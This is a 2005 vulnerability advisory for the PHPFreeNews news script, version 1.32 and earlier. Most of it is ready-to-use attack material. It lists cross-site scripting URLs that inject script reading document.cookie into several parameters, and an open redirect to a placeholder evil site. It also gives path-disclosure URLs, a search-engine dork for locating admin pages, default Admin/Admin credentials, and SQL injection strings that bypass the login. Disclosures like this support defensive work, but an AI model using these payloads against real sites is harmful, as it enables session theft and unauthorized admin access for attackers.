PHPFreeNews versions 1.32 and below are susceptible to SQL injection, login bypass, and cross site scripting attacks.
6e4950591016029b7b9fdf3825bfbb4a41f8b7f1496b92f39e7a67fd1fef0b1e
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-number">29/07/2005 8.36.03
PHPFreeNews Version 1.32 (& previous) sql injection/login bypass, cross site scripting, path disclosure, information disclosure
author site: http://www.phpfreenews.co.uk/Main_Intro.php
xss poc:
http://[target]/[path]/inc/Footer.php?ScriptVersion=<script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&NewsDir=")}//--></script><script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?EnableRatings=1&NewsDir=")}//--></script><script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&NewsDir=")}//--></script><script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupWidth=")}//--></script><script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupHeight=")}//--></script><script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&PopupWidth=")}//--></script><script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&PopupHeight=")}//--></script><script>alert(document.cookie)</script>
also a user can craft a url to redirect a victim to an evil site:
http://[target]/[path]/inc/Logout.php?AdminScript=http://[evil_site]/[evil_script]
path disclosure:
http://[target]/[path]/inc/ArchiveOldNews.php
http://[target]/[path]/inc/Categories.php
http://[target]/[path]/inc/CheckLogout.php
http://[target]/[path]/inc/CommentsApproval.php
http://[target]/[path]/inc/Images.php
http://[target]/[path]/inc/NewsList.php
http://[target]/[path]/inc/Password.php
http://[target]/[path]/inc/Post.php
http://[target]/[path]/inc/PostsApproval.php
http://[target]/[path]/inc/PurgeOldNews.php
http://[target]/[path]/inc/SetSticky.php
http://[target]/[path]/inc/SetVisible.php
http://[target]/[path]/inc/Statistics.php
http://[target]/[path]/inc/Template.php
http://[target]/[path]/inc/UserDefinedCodes.php
http://[target]/[path]/inc/Users.php
information disclosure:
googledork:
PHPFreeNews inurl:Admin.php
(with this, you can passively fingerprint the server, PHP & MySQL version are in Google description...
because this info are shownwed with non-chalance in admin.php page ;) )
default password:
login: Admin
pass: Admin
MySQL Injection / Login Bypass in previous versions:
login: Admin
password: ') or isnull(1/0) or ('a'='a
note: all string, not consider 'or'
in 1.32 version LoginUsername and LoginPassword vars are addslashed... but, try this:
login: whatever<br>pass: //') or isnull(1/0) /*<br> <br>this is definetely patched in 1.40 version
rgod
email: retrogod at aliceposta.it
site: http://rgod.altervista.org
</span></span>
</code></pre>